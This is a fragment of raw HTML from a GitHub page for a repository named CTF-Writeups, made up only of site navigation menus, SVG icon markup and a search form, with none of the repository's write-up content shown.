data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div> Explore All features Documentation <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> GitHub Skills <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Blog <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For Enterprise Teams Startups Education <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> By Solution CI/CD & Automation DevOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> DevSecOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Case Studies Customer Stories Resources <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> <div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div> <div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div> Repositories Topics Trending Collections </div> Pricing </nav> <div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0"> <div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="481769760" data-scoped-search-url="/not1cyyy/CTF-Writeups/search" data-owner-scoped-search-url="/users/not1cyyy/search" data-unscoped-search-url="/search" data-turbo="false" action="/not1cyyy/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="EJtD4zldb8+SsvxC4eT86MEs4D5FSfk/LIUJ5upS14G1/YWK7XMYD0238lQr8hKEoqq941eZt3FaFEHOJ5FmNQ==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <span>No suggested jump to results</span> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none 